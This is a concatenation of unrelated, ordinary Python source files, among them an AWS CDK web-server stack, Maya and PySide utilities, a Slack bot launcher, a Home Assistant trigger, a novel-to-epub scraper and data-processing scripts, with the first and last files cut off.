newSG = ec2.SecurityGroup(self, 'Webec2SG', vpc=vpc, security_group_name="Webec2SG",
description="for aws cdk python lab create webec2 SG")
newSG.add_ingress_rule(peer=ec2.Peer.ipv4(
your_public_ip), connection=ec2.Port.tcp(22))
newSG.add_ingress_rule(peer=ec2.Peer.any_ipv4(),
connection=ec2.Port.tcp(80))
newSG.add_ingress_rule(peer=ec2.Peer.any_ipv4(),
connection=ec2.Port.tcp(443))
# aws linux 2
# newec2 = ec2.Instance(self, 'webec2', instance_type=ec2.InstanceType(instance_type_identifier="t2.micro"), instance_name='webec2', vpc=vpc, security_group=newSG,
# key_name=my_key_pair, machine_image=ec2.LookupMachineImage(name="amzn2-ami-hvm-2.0.20200406.0-x86_64-gp2", user_data=ec2.UserData.custom(userdata)))
newec2 = ec2.Instance(self, 'webec2', instance_type=ec2.InstanceType(instance_type_identifier="t2.micro"), instance_name='webec2', vpc=vpc, security_group=newSG,
key_name=my_key_pair, machine_image=ec2.LookupMachineImage(name="amzn2-ami-hvm-2.0.20200406.0-x86_64-gp2",
user_data=shellCommands))
# ubuntu 16.04
# newec2 = ec2.Instance(self, 'webec2', instance_type=ec2.InstanceType(instance_type_identifier="t2.micro"), instance_name='webec2', vpc=vpc, security_group=newSG,
# key_name=my_key_pair, machine_image=ec2.LookupMachineImage(name="ubuntu/images/hvm-ssd/ubuntu-xenial-16.04-amd64-server-20200407", user_data=ec2.UserData.custom(userdata)))
newec2.role.add_managed_policy(
iam.ManagedPolicy.from_aws_managed_policy_name("AmazonSSMManagedInstanceCore"))
neweip = ec2.CfnEIP(self, "EIP", domain=vpc.vpc_id, tags=[core.CfnTag(
key="Name", value="WEBEC2EIP")], instance_id=newec2.instance_id)
# search my route53 HostedZone.
zone = r53.HostedZone.from_hosted_zone_attributes(
self, 'MYHOSTED_ZONE', hosted_zone_id=my_hosted_zone, zone_name=my_zone_name)
# target neweip .
newdomain = r53.ARecord(self, "Route53NewArecord", zone=zone,
target=r53.RecordTarget.from_ip_addresses(neweip.ref), record_name="cdk-demo", ttl=core.Duration.minutes(5))
core.CfnOutput(self, 'domainname', value=newdomain.domain_name)
core.CfnOutput(self, 'hosted_zone', value=zone.zone_name)
core.CfnOutput(self, 'ec2-public-ip',
value=newec2.instance_public_dns_name)
core.CfnOutput(self, 'vpc-id', value=vpc.vpc_id)
core.CfnOutput(self, 'sg-id', value=newSG.security_group_id)
core.CfnOutput(self, 'instance-id', value=newec2.instance_id)
core.CfnOutput(self, 'local-az',
value=newec2.instance.availability_zone)
core.CfnOutput(self, 'subnet-id', value=newec2.instance.subnet_id)
core.CfnOutput(self, 'region', value=self.region)
|
from maya.api import OpenMaya
from mango.vendor import apiundo
def execute_modifier(modifier):
"""
Execute a modifier object. After this the apiundo package is used to
ensure that the command is undo/redo-able within Maya.
:param OpenMaya.MDGModifier/OpenMaya.MDagModifier modifier:
"""
modifier.doIt()
apiundo.commit(undo=modifier.undoIt, redo=modifier.doIt)
class MDGModifier(object):
def __init__(self):
self._modifier = OpenMaya.MDGModifier()
def __enter__(self):
return self._modifier
def __exit__(self, exc_type, exc_val, exc_tb):
execute_modifier(self._modifier)
class MDagModifier(object):
def __init__(self):
self._modifier = OpenMaya.MDagModifier()
def __enter__(self):
return self._modifier
def __exit__(self, exc_type, exc_val, exc_tb):
execute_modifier(self._modifier)
def get_object(node):
"""
:param str node:
:return: Maya object node
:rtype: OpenMaya.MObject
"""
sel = OpenMaya.MSelectionList()
sel.add(node)
return sel.getDependNode(0)
def get_plug(node):
"""
:param str node:
:return: Maya plug node
:rtype: OpenMaya.MPlug
"""
sel = OpenMaya.MSelectionList()
sel.add(node)
return sel.getPlug(0)
def create_node(node_type, name=None, parent=None):
"""
:param str node_type:
:param str/None name:
:param str/OpenMaya.MObject/None parent:
:return: Node
:rtype: OpenMaya.MObject
"""
# convert parent
if not parent:
parent = OpenMaya.MObject.kNullObj
elif not isinstance(parent, OpenMaya.MObject):
parent = get_object(parent)
# create node
try:
rename_children = True
modifier = OpenMaya.MDagModifier()
m_object = modifier.createNode(node_type, parent)
except TypeError:
rename_children = False
modifier = OpenMaya.MDGModifier()
m_object = modifier.createNode(node_type)
# rename node
if name:
modifier.renameNode(m_object, name)
    # Execute the modifier; this needs to happen now, as otherwise no shape nodes
    # exist yet and the shapes will not be renamed. The renaming of the shapes
    # is wrapped in a separate modifier.
execute_modifier(modifier)
# rename node shapes
if name and rename_children:
with MDGModifier() as modifier:
m_dag_path = OpenMaya.MDagPath.getAPathTo(m_object)
for index in range(m_dag_path.childCount()):
modifier.renameNode(
m_dag_path.child(index),
"{}Shape#".format(name)
)
return m_object
|
#!/usr/bin/env python2
# -*- coding: utf-8 -*-
import numpy as np
import matplotlib.pyplot as plt
plt.clf()
plt.close('all')
y = np.linspace(-4,4,1000)
lam0 = 1e-1
lam1 = 1.0
lam2 = 1e1
###############################################################################
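# Each fy* function below evaluates (what appears to be) the Moreau envelope of
# the corresponding f*:  M_lam f(y) = min_x ( f(x) + (x - y)^2 / (2*lam) ),
# in closed form; lam controls how strongly the original function is smoothed.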
f1 = np.max([np.zeros_like(y), 1.-y], axis=0)
def fy1(lam):
fy1_lam = np.zeros_like(y)
for i, yi in enumerate(y):
if yi < 1-lam:
fy1_lam[i] = 1. - yi - 0.5*lam
if yi >= 1-lam and yi < 1:
fy1_lam[i] = 1./(lam*2.)*(yi-1)**2
if yi >= 1:
fy1_lam[i] = 0
return fy1_lam
fy1_lam0 = fy1(lam0)
fy1_lam1 = fy1(lam1)
fy1_lam2 = fy1(lam2)
###############################################################################
f2 = np.abs(y) + (np.abs(y)**3) / 3.
def fy2(lam):
fy2_lam = np.zeros_like(y)
def tmp_plus(yii):
return -(1.0/lam)/2.0 + (((1.0/lam)/2.)**2. - (1.0 - (yii/lam)))**0.5
def tmp_minus(yii):
        return -(-1.0/lam)/2. - (((-1.0/lam)/2.)**2. - (1.0 + (yii/lam)))**0.5
for i, yi in enumerate(y):
if yi > lam:
y1 = tmp_plus(yi)
fy2_lam[i] = y1 + (y1**3.0)/3.0 + (np.linalg.norm(yi - y1)**2.)/(2.*lam)
elif -lam <= yi and yi <= lam:
fy2_lam[i] = (yi**2.)/(2.*lam)
        elif yi < -lam:
y1 = tmp_minus(yi)
fy2_lam[i] = -y1 + ((-y1)**3.0)/3.0 + (np.linalg.norm(yi - y1)**2.)/(2.*lam)
return fy2_lam
fy2_lam0 = fy2(lam0)
fy2_lam1 = fy2(lam1)
fy2_lam2 = fy2(lam2)
###############################################################################
f3 = np.zeros_like(y)
inf = 20.
a = -2.
b = 2.
for i, yi in enumerate(y):
if yi >= a and yi <= b:
f3[i] = 0
else:
f3[i] = inf
def fy3(lam):
fy3_lam = np.zeros_like(y)
frac_l = 1./(2.*lam)
for i, yi in enumerate(y):
if yi < a:
fy3_lam[i] = frac_l * np.linalg.norm(yi-a)**2
if yi >= a and yi <= b:
fy3_lam[i] = 0
if yi > b:
fy3_lam[i] = frac_l * np.linalg.norm(yi-b)**2
return fy3_lam
fy3_lam0 = fy3(lam0)
fy3_lam1 = fy3(lam1)
fy3_lam2 = fy3(lam2)
###############################################################################
f4 = np.max([np.abs(y), (np.abs(y)**2)],axis=0)
def fy4(lam):
fy4_lam = np.zeros_like(y)
lam2 = (2*lam)
    def f(yi, lam):
        return (yi/(2*lam+1))**2 + np.linalg.norm(yi*(1-(1/(2*lam+1))))**2 / lam2
for i, yi in enumerate(y):
if yi >= 2.*lam + 1:
fy4_lam[i] = f(yi,lam)
if yi <= -2*lam - 1:
fy4_lam[i] = f(yi,lam)
if yi < 1 + 2*lam and yi >= 1+lam:
fy4_lam[i] = 1 + np.linalg.norm(yi - 1)**2 / lam2
if yi > -1 - 2*lam and yi <= -1-lam:
fy4_lam[i] = 1 + np.linalg.norm(yi + 1)**2 / lam2
if yi < 1+ lam and yi >= lam:
fy4_lam[i] = np.abs(y[i]-lam) + lam/2.
if yi > -1- lam and yi <= -lam:
fy4_lam[i] = np.abs(y[i]+lam) + lam/2.
if yi < lam and yi > -lam:
fy4_lam[i] = np.linalg.norm(yi)**2 / lam2
return fy4_lam
fy4_lam0 = fy4(lam0)
fy4_lam1 = fy4(lam1)
fy4_lam2 = fy4(lam2)
def plot_functions(fyx_lambda_x, fct_name):
plt.figure()
plt.title(fct_name)
plt.plot(y, fyx_lambda_x[0], label=fct_name)
plt.plot(y, fyx_lambda_x[1], '--', label='lambda=0.1')
plt.plot(y, fyx_lambda_x[2], '--', label='lambda=1')
plt.plot(y, fyx_lambda_x[3], '--', label='lambda=10')
plt.xlabel("y")
plt.grid()
plt.legend()
plt.savefig('ass3_description/'+fct_name+'.png')
plt.show()
plot_functions([f1, fy1_lam0, fy1_lam1, fy1_lam2], 'f1(y)')
plot_functions([f2, fy2_lam0, fy2_lam1, fy2_lam2], 'f2(y)')
plot_functions([f3, fy3_lam0, fy3_lam1, fy3_lam2], 'f3(y)')
plot_functions([f4, fy4_lam0, fy4_lam1, fy4_lam2], 'f4(y)')
|
# -*- coding: utf-8 -*-
from ucloud.core.exc._exc import (
UCloudException,
ValidationException,
RetCodeException,
RetryTimeoutException,
)
__all__ = [
"UCloudException",
"ValidationException",
"RetCodeException",
"RetryTimeoutException",
]
|
import os
from celery import Celery
os.environ.setdefault('DJANGO_SETTINGS_MODULE',
'pytopo.settings')
app = Celery('pytopo')
app.config_from_object('django.conf:settings', namespace='CELERY')
app.autodiscover_tasks()
@app.task(bind=True)
def debug_task(self):
print('Request: {0!r}'.format(self.request)) |
import logging
import math
import numpy as np
#TODO: Remove this line
from PySide.QtGui import QGraphicsPolygonItem, QImage
from PySide.QtGui import QColor, QGraphicsPixmapItem, QPixmap
from PySide.QtCore import QPoint, QPointF, Qt
from traits.api import Bool, Enum, DelegatesTo, Dict, HasTraits, Instance, Int, List, WeakRef, on_trait_change
from arrview import settings
from arrview.colormapper import ArrayPixmap
from arrview.roi import ROI, ROIManager
from arrview.slicer import Slicer
from arrview.tools.base import GraphicsTool, GraphicsToolFactory, MouseState
from arrview.tools.paintbrush import PaintBrushItem
log = logging.getLogger(__name__)
_paintbrush_z = 100
_foreground_roi_z = 11
_background_roi_z = 10
def _pixmap_to_ndarray(pixmap, alpha_threshold=0):
"""Convert a pixmap to a ndarray mask
Parameters
----------
pixmap : QPixmap
pixmap to convert to ndarray
alpha_threshold : float
convert pixels with alpha > than this value to 1's and values <= threshold to 0's
Returns
-------
A binary mask of the pixmap as a ndarray
"""
img = pixmap.toImage()
w, h = img.width(), img.height()
ptr = img.constBits()
arr = np.frombuffer(ptr, dtype='uint8').reshape(h, w, 4)
out = (arr[...,3] > alpha_threshold).copy()
return out
def _ndarray_to_arraypixmap(array, color=(0, 255, 0, 128)):
"""Convert a binary array to an ArrayPixmap with specified color and alpha level
Args:
array -- binary ndarray
color -- RGBA color tuple. [0, 255] for each channel
Returns:
        An ArrayPixmap of the ndarray with constant alpha value
and color. The input array is colored with *color* and *alpha*
anywhere it is equal to 1.
"""
assert array.ndim == 2, 'Only 2D arrays are supported'
assert len(color) == 4, 'Color should be a 4-tuple'
h, w = array.shape
array = array.astype('uint32')
    # pack the RGBA channels into 32-bit 0xAARRGGBB words (QImage.Format_ARGB32)
    array = (color[3] * array) << 24 \
          | (color[0] * array) << 16 \
          | (color[1] * array) << 8 \
          | (color[2] * array)
pixdata = array.flatten()
img = QImage(pixdata, w, h, QImage.Format_ARGB32)
return ArrayPixmap(pixdata, QPixmap.fromImage(img))
def _display_color(color, selected):
alpha = 0.7 if selected else 0.4
color = QColor(color)
    color.setAlpha(255 * alpha)  # scale display alpha based on selection state
return color
class ROIDisplayItem(HasTraits):
roi = Instance(ROI)
selected = Bool(False)
slicer = Instance(Slicer)
pixmap = Instance(QPixmap, default=None)
pixmapitem = Instance(QGraphicsPixmapItem, default=None)
def __init__(self, graphics, slicer, **kwargs):
self._graphics = graphics
self.slicer = slicer
super(ROIDisplayItem, self).__init__(**kwargs)
def destroy(self):
self._graphics.scene().removeItem(self.pixmapitem)
@on_trait_change('roi')
def _roi_changed(self, obj, name, old, new):
if old is not None:
self._graphics.scene().removeItem(self.pixmapitem)
self.pixmapitem = None
self.pixmap = None
if new is not None:
self.pixmapitem = QGraphicsPixmapItem()
self._set_pixmap_from_roi(new)
self._graphics.scene().addItem(self.pixmapitem)
@on_trait_change('roi:updated,roi:visible,slicer:slc,selected')
def _roi_updated(self):
self._set_pixmap_from_roi(self.roi)
def _set_pixmap_from_roi(self, roi):
if roi.visible:
color = _display_color(roi.color, self.selected)
else:
color = QColor(Qt.transparent)
self.pixmap = _ndarray_to_arraypixmap(roi.mask[self.slicer.slc.view_slice], color.toTuple())
self.pixmapitem.setPixmap(self.pixmap)
self.pixmapitem.setZValue(_foreground_roi_z if self.selected else _background_roi_z)
class ROIEdit(HasTraits):
roi_tool = WeakRef('_ROITool')
color = Instance(QColor, default=QColor(Qt.black))
def __init__(self, **traits):
self._origin = None
super(ROIEdit, self).__init__(**traits)
self.paintbrush = PaintBrushItem(radius=self.roi_tool.roi_size)
self.paintbrush.setZValue(_paintbrush_z) # Make this item draw on top
self.paintbrush.hide()
self.roi_tool.graphics.scene().addItem(self.paintbrush)
def destroy(self):
self.roi_tool.graphics.scene().removeItem(self.paintbrush)
@on_trait_change('roi_tool:roi_size')
def _roi_size_changed(self):
self.paintbrush.set_radius(self.roi_tool.roi_size)
def _paint(self):
for rdi in self.roi_tool.roi_display_item_dict.itervalues():
if rdi.selected and rdi.roi.visible:
self.paintbrush.fill_pixmap(rdi.pixmap,
QPoint(*self._origin),
QPoint(*self.roi_tool.mouse.coords))
rdi.pixmapitem.setPixmap(rdi.pixmap)
@on_trait_change('roi_tool:roi_manager.selection[]')
def _roi_manager_selection_changed(self):
if not self.roi_tool.mode == 'erase' and len(self.roi_tool.roi_manager.selection) == 1:
color = _display_color(self.roi_tool.roi_manager.selection[0].roi.color, selected=True)
else:
color = QColor(Qt.transparent)
self.paintbrush.set_color(color)
@on_trait_change('roi_tool:mouse:entered')
def mouse_entered(self):
self.paintbrush.show()
@on_trait_change('roi_tool:mouse:left')
def mouse_left(self):
self.paintbrush.hide()
self._origin = None
@on_trait_change('roi_tool:mouse:pressed')
def mouse_pressed(self):
if not self.roi_tool.mouse.buttons.left:
return
if not (self.roi_tool.mode == 'erase' or self.roi_tool.roi_manager.selection):
self.roi_tool.roi_manager.new_roi()
self._origin = self.roi_tool.mouse.coords
self._paint()
@on_trait_change('roi_tool:mouse:moved')
def mouse_moved(self):
coords = self.roi_tool.mouse.coords
self.paintbrush.setPos(QPoint(*coords))
if self._origin:
self._paint()
self._origin = coords
return True
@on_trait_change('roi_tool:mouse:released')
def mouse_released(self):
self._origin = None
for rdi in self.roi_tool.roi_display_item_dict.itervalues():
if rdi.selected and rdi.roi.visible:
mask = _pixmap_to_ndarray(rdi.pixmap)
self.roi_tool.roi_manager.update_mask(rdi.roi, mask)
class _ROITool(GraphicsTool):
name = 'ROI'
roi_size = Int(0)
mode = DelegatesTo('factory')
roi_display_item_dict = Dict(ROI, ROIDisplayItem)
roi_manager = Instance(ROIManager)
def init(self):
self.roi_editor = None
if self.mode in {'draw', 'erase'}:
self.roi_editor = ROIEdit(roi_tool=self)
self.roi_manager = self.factory.roi_manager
self.roi_size = self.factory.factory.roi_size
def destroy(self):
for rdi in self.roi_display_item_dict.values():
rdi.destroy()
if self.roi_editor:
self.roi_editor.destroy()
self.roi_editor = None # Remove reference to ROIEdit, ensures delete
@on_trait_change('factory:factory.roi_size')
def _factory_roi_size_changed(self):
self.roi_size = self.factory.factory.roi_size
@on_trait_change('roi_manager')
def _roi_manager_changed(self):
self._update_roi_display_item_dict(self.roi_manager.rois)
self._update_roi_selection(self.roi_manager.selection)
@on_trait_change('roi_manager:selection[]')
def _roi_selection_changed(self, obj, name, old, new):
for rv in old:
rdi = self.roi_display_item_dict.get(rv.roi)
if rdi:
rdi.selected = False
self._update_roi_selection(new)
@on_trait_change('roi_manager:rois[]')
def _rois_changed(self, obj, name, old, new):
for roi in old:
rdi = self.roi_display_item_dict.pop(roi)
rdi.destroy()
self._update_roi_display_item_dict(new)
def _update_roi_selection(self, roi_views):
for rv in roi_views:
self.roi_display_item_dict[rv.roi].selected = True
def _update_roi_display_item_dict(self, rois):
for roi in rois:
self.roi_display_item_dict[roi] = ROIDisplayItem(self.graphics,
self.roi_manager.slicer,
roi=roi)
class ROITool(GraphicsToolFactory):
klass = _ROITool
roi_manager = Instance(ROIManager)
factory = Instance(object)
mode = Enum('view', 'draw', 'erase')
|
from django.apps import AppConfig
class CryptoserverConfig(AppConfig):
name = 'cryptoserver'
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
import re, sys, time, os, subprocess
import pickle as pk
from rtmbot.bin.run_rtmbot import main
from Settings import initSettings
def editConf(Settings):
    'Will edit the rtmbot.conf file'
#Reading lines of rtmbot.conf
with open('rtmbot.conf',"r") as outfile:
conf = outfile.readlines()
    #Changing 3rd line to add current token
conf[2] = " SLACK_TOKEN: \"{}\"\n".format(Settings['SLACK_BOT_TOKEN'])
#Editing rtmbot.conf with SLACK_BOT_TOKEN as SLACK_TOKEN
with open('rtmbot.conf',"w") as outfile:
outfile.writelines(conf)
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
# sys.exit(main())
try:
while True: # super hacky, added this to reboot if connection fails
try: #Will restart after 5 seconds if goes down
#If settings not instantiated
if not os.path.isfile('Settings.txt'):
Settings = initSettings()
                    #Edit rtmbot.conf file to add bot token
editConf(Settings)
else:
#Checking if Settings.txt is empty or bad
try:
with open('Settings.txt', 'rb') as f:
Settings = pk.loads(f.read())
except:
cont = input(['\nIt seems like your Settings.txt file is bad. Press 1 if you ' +
'want to create a new Settings.txt file, otherwise press 0 : ' ][0])
if cont == '1':
Settings = initSettings()
editConf(Settings)
else:
print('Aborting.')
quit()
#Running bot
print('\nAntiscam Bot Initiation.')
main()
except Exception as ex:
#Printing error and restart message
print('\nError : ') ; print(ex)
print('\nRESTARTING IN 5 SECONDS.\n')
                #Restart after 5 seconds
time.sleep(5)
except KeyboardInterrupt:
pass
|
from anthill.common.options import options
from anthill.common import server, handler, keyvalue, database, access
from . model.deploy import DeploymentModel
from . model.bundle import BundlesModel
from . model.data import DatasModel
from . model.apps import ApplicationsModel
from . import handler
from . import admin
from . import options as _opts
class DLCServer(server.Server):
def __init__(self):
super(DLCServer, self).__init__()
self.db = database.Database(
host=options.db_host,
database=options.db_name,
user=options.db_username,
password=options.db_password)
self.cache = keyvalue.KeyValueStorage(
host=options.cache_host,
port=options.cache_port,
db=options.cache_db,
max_connections=options.cache_max_connections)
self.data_host_location = options.data_host_location
self.app_versions = ApplicationsModel(self.db)
self.bundles = BundlesModel(self.db)
self.deployment = DeploymentModel(self.bundles, self.app_versions)
self.datas = DatasModel(self.bundles, self.deployment, self.db)
def get_models(self):
return [self.datas, self.bundles, self.deployment, self.app_versions]
def get_admin(self):
return {
"index": admin.RootAdminController,
"app": admin.ApplicationController,
"app_version": admin.ApplicationVersionController,
"data_version": admin.DataVersionController,
"bundle": admin.BundleController,
"new_bundle": admin.NewBundleController,
"attach_bundle": admin.AttachBundleController,
"app_settings": admin.ApplicationSettingsController
}
def get_metadata(self):
return {
"title": "DLC",
"description": "Deliver downloadable content to the user",
"icon": "cloud-download"
}
def get_handlers(self):
return [
(r"/bundle", handler.FetchBundleHandler),
(r"/data/([a-z0-9_-]+)/([a-z0-9_\.-]+)", handler.AppVersionHandler),
]
if __name__ == "__main__":
stt = server.init()
access.AccessToken.init([access.public()])
server.start(DLCServer)
|
"""
homeassistant.components.automation.state
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Offers state listening automation rules.
For more details about this automation rule, please refer to the documentation
at https://home-assistant.io/components/automation/#state-trigger
"""
import logging
from homeassistant.helpers.event import track_state_change
from homeassistant.const import MATCH_ALL
CONF_ENTITY_ID = "entity_id"
CONF_FROM = "from"
CONF_TO = "to"
CONF_STATE = "state"
def trigger(hass, config, action):
""" Listen for state changes based on `config`. """
entity_id = config.get(CONF_ENTITY_ID)
if entity_id is None:
logging.getLogger(__name__).error(
"Missing trigger configuration key %s", CONF_ENTITY_ID)
return False
from_state = config.get(CONF_FROM, MATCH_ALL)
to_state = config.get(CONF_TO) or config.get(CONF_STATE) or MATCH_ALL
if isinstance(from_state, bool) or isinstance(to_state, bool):
logging.getLogger(__name__).error(
'Config error. Surround to/from values with quotes.')
return False
def state_automation_listener(entity, from_s, to_s):
""" Listens for state changes and calls action. """
action()
track_state_change(
hass, entity_id, state_automation_listener, from_state, to_state)
return True
def if_action(hass, config):
""" Wraps action method with state based condition. """
entity_id = config.get(CONF_ENTITY_ID)
state = config.get(CONF_STATE)
if entity_id is None or state is None:
logging.getLogger(__name__).error(
"Missing if-condition configuration key %s or %s", CONF_ENTITY_ID,
CONF_STATE)
return None
state = str(state)
def if_state():
""" Test if condition. """
return hass.states.is_state(entity_id, state)
return if_state
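# Example (editorial sketch, not part of the original module): a minimal config
# dict as this trigger expects, using the CONF_* keys defined above; the entity
# id and states are illustrative.
# config = {"entity_id": "light.kitchen", "from": "off", "to": "on"}
# trigger(hass, config, action)   # `hass` and `action` are supplied by the caller
# check = if_action(hass, {"entity_id": "light.kitchen", "state": "on"})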
|
# pylint: disable = pointless-statement, pointless-string-statement
# pylint: disable = no-value-for-parameter, expression-not-assigned
# pylint: disable = too-many-lines, redefined-outer-name
import os
import pathlib
from typing import List, Optional
from pymedphys._imports import streamlit as st
from typing_extensions import TypedDict
from pymedphys._monaco import patient as mnc_patient
from pymedphys._streamlit.utilities import exceptions as _exceptions
from . import exceptions, misc
class TelFilePickerResults(TypedDict, total=False):
patient_id: str
patient_name: str
monaco_site: str
monaco_directory: pathlib.Path
selected_monaco_plan: str
tel_paths: List[pathlib.Path]
def monaco_tel_files_picker(
config: dict,
patient_id: str = "",
key_namespace: str = "",
advanced_mode: bool = False,
site: Optional[str] = None,
plan_selection_text: str = "",
) -> TelFilePickerResults:
"""A Streamit widget for selecting a Monaco plan tel file.
Parameters
----------
config : dict
The user's configuration
patient_id : str, optional
A patient ID to default to, by default ""
key_namespace : str, optional
A string to prepend to all Streamlit widget keys, by default ""
advanced_mode : bool, optional
Whether or not to display information and options intended for
advanced users, by default False
site : str, optional
A site to default to, by default None
plan_selection_text : str, optional
Text to display to the user before the plan selection radio
button, by default ""
Returns
-------
results : TelFilePickerResults (dict)
"""
(
monaco_site,
monaco_directory,
patient_id,
plan_directory,
patient_directory,
) = monaco_patient_directory_picker(
config, patient_id, key_namespace, advanced_mode, site
)
patient_name = read_monaco_patient_name(str(patient_directory))
st.write(f"Patient Name: `{patient_name}`")
all_tel_paths = list(plan_directory.glob("**/*tel.1"))
all_tel_paths = sorted(all_tel_paths, key=os.path.getmtime, reverse=True)
plan_names_to_choose_from = [
str(path.relative_to(plan_directory)) for path in all_tel_paths
]
if len(plan_names_to_choose_from) == 0:
if patient_id != "":
st.write(
_exceptions.NoRecordsFound(
f"No Monaco plans found for patient ID {patient_id}"
)
)
return {"patient_id": patient_id}
if plan_selection_text != "":
st.write(plan_selection_text)
selected_monaco_plan = st.radio(
"Select a Monaco plan",
plan_names_to_choose_from,
key=f"{key_namespace}_monaco_plans",
)
tel_paths = []
if selected_monaco_plan is not None:
current_plans = list(
monaco_directory.glob(f"*~{patient_id}/plan/{selected_monaco_plan}")
)
current_plans = [path.resolve() for path in current_plans]
if len(current_plans) != 1:
st.write("Plans found:", current_plans)
raise ValueError("Exactly one plan should have been found")
tel_paths += current_plans
return {
"monaco_site": monaco_site,
"monaco_directory": monaco_directory.resolve(),
"patient_id": patient_id,
"patient_name": patient_name,
"selected_monaco_plan": selected_monaco_plan,
"tel_paths": tel_paths,
}
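# Example usage inside a Streamlit app (editorial sketch; `config` is assumed to
# follow pymedphys' site configuration layout and is not defined here):
# results = monaco_tel_files_picker(config, advanced_mode=True)
# for tel_path in results.get("tel_paths", []):
#     st.write(tel_path)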
def monaco_patient_directory_picker(
config, patient_id="", key_namespace="", advanced_mode=False, site=None
):
monaco_site, monaco_directory = misc.get_site_and_directory(
config,
"Monaco Plan Location",
"monaco",
default=site,
key=f"{key_namespace}_monaco_site",
)
if advanced_mode:
st.write(monaco_directory.resolve())
patient_id = st.text_input(
"Patient ID", patient_id, key=f"{key_namespace}_patient_id"
)
if advanced_mode:
patient_id
if patient_id == "":
st.stop()
plan_directories = list(monaco_directory.glob(f"*~{patient_id}/plan"))
if len(plan_directories) == 0:
if patient_id != "":
st.write(
exceptions.NoRecordsFound(
f"No Monaco plan directories found for patient ID {patient_id}"
)
)
st.stop()
return {"patient_id": patient_id}
elif len(plan_directories) > 1:
raise ValueError(
"More than one patient plan directory found for this ID, "
"please only have one directory per patient. "
"Directories found were "
f"{', '.join([str(path.resolve()) for path in plan_directories])}"
)
plan_directory = plan_directories[0]
patient_directory = pathlib.Path(plan_directory).parent
return monaco_site, monaco_directory, patient_id, plan_directory, patient_directory
@st.cache
def read_monaco_patient_name(monaco_patient_directory):
return mnc_patient.read_patient_name(monaco_patient_directory)
|
#!/usr/bin/python37
# -*- coding: utf-8 -*-
import os
import sys
from urllib.parse import urlparse
import re
from bs4 import BeautifulSoup
import requests
import html2epub
DIR = "C:\\Users\\baoju\\Desktop\\" # 输出epub文件的路径
html_template = """
<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
</head>
<body>
{content}
</body>
</html>
"""
def getbook(url):  # fetch the whole book and collect its chapters as html
try:
r = requests.request('GET', url)
except:
print("分析失败了, 稍后再试吧")
sys.exit()
domain = '{uri.scheme}://{uri.netloc}'.format(
uri=urlparse(url))
soup = BeautifulSoup(r.text, 'html.parser')
name = soup.title.string
bookName = re.sub(r'[\/:*?"<>|]', '-', name)
tags = soup.find_all('td', class_='t_f')
htmls = []
for eachTag in tags:
html = str(eachTag)
html = html.replace("file", "src")
html = html.replace("td", "div")
        # convert relative img src paths in the html to absolute URLs
pattern = "(<img .*?src=\")(.*?)(\")"
def func(m):
if not m.group(2).startswith("http"):
rtn = "".join(
[m.group(1), domain, m.group(2), m.group(3)])
return rtn
else:
return "".join([m.group(1), m.group(2), m.group(3)])
html = re.compile(pattern).sub(func, html)
html = html_template.format(content=html)
htmls.append(html)
print("下载完毕, 准备整合epub")
return bookName, htmls
def saveEpub(url):
bookName, htmls = getbook(url)
epub = html2epub.Epub(bookName)
i = 0
print("开始整合epub...")
for eachHtml in htmls:
i += 1
chapter = html2epub.create_chapter_from_string(
            eachHtml, title="Chapter " + str(i))
epub.add_chapter(chapter)
print("已整合{:.2f}%".format(
(htmls.index(eachHtml) + 1) / len(htmls) * 100))
epub.create_epub(DIR)
print("整合完毕.")
if __name__ == "__main__": # 主函数
    # URL = input("Enter the URL to download: ")  # read the target address
    # print("URL: " + URL + "\nStarting download...")
URL = "https://www.lightnovel.cn/forum.php?mod=viewthread&tid=989498&page=1&authorid=1078151"
saveEpub(URL)
|
from django.conf import settings
def mediawiki_site_settings(request):
return {
'MEDIAWIKI_API_ENDPOINT': settings.MEDIAWIKI_API_ENDPOINT,
'MEDIAWIKI_BASE_URL': settings.MEDIAWIKI_BASE_URL,
'MEDIAWIKI_INDEX_ENDPOINT': settings.MEDIAWIKI_INDEX_ENDPOINT,
'PROPERTY_BASE_URL': settings.PROPERTY_BASE_URL,
'USER_BASE_URL': settings.USER_BASE_URL,
'USER_TALK_BASE_URL': settings.USER_TALK_BASE_URL,
'CONTRIBUTIONS_BASE_URL': settings.CONTRIBUTIONS_BASE_URL,
'WIKI_CODENAME': settings.WIKI_CODENAME,
'USER_DOCS_HOMEPAGE': settings.USER_DOCS_HOMEPAGE,
'MEDIAWIKI_NAME': settings.MEDIAWIKI_NAME,
'DISCUSS_PAGE_PREFIX': settings.DISCUSS_PAGE_PREFIX,
'DISCUSS_PAGE_PRELOAD': settings.DISCUSS_PAGE_PRELOAD,
'REVERT_PAGE': settings.REVERT_PAGE,
'REVERT_PRELOAD': settings.REVERT_PRELOAD,
'WIKILINK_BATCH_PREFIX': settings.WIKILINK_BATCH_PREFIX
}
|
import os
import re
import json
from cfg import *
class Preprocesser:
def __init__(self, origin_path, target_path, label_path):
self.origin_path = origin_path
self.target_path = target_path
self.label_path = label_path
def merge(self):
print('get original file list...')
origin_list = os.listdir(self.origin_path)
with open(self.label_path, 'w', encoding='utf-8') as f_label:
json.dump(origin_list, f_label, ensure_ascii=False)
print('merge original file list...')
id = 0
with open(self.target_path, 'w', encoding='utf-8') as f_write:
for file_idx, filename in enumerate(origin_list):
with open(os.path.join(self.origin_path, filename), 'r', encoding='utf-8') as f:
for line in f.readlines():
doc_list = line.strip().split('|||')
try:
index, title, date, url, text = doc_list
except:
print(f"[error] line {doc_list} is not in a correct format")
continue
if not index.isdigit():
continue
                        if not re.search(r'\d+-\d+-\d+', date):
continue
new_doc_line = f'{str(file_idx).zfill(3)}|||{str(id).zfill(5)}|||{title}|||{date}|||{url}|||{text}\n'
f_write.write(new_doc_line)
id += 1
print(f'finish writing {filename}')
print(f'write {id} documents')
if __name__ == '__main__':
preprocesser = Preprocesser(origin_path=ORIGIN_PATH, target_path=TARGET_PATH, label_path=LABEL_PATH)
preprocesser.merge()
|
import elasticsearch
import boto3
from elasticsearch import Elasticsearch, RequestsHttpConnection
from requests_aws4auth import AWS4Auth
INDEX = "toyo_items"
host = 'search-nakamura196-rgvfh3jsqpal3gntof6o7f3ch4.us-east-1.es.amazonaws.com'
profile_name = "default"
region = "us-east-1"
if profile_name is None:
es = Elasticsearch([host])
else:
session = boto3.Session(profile_name=profile_name)
credentials = session.get_credentials()
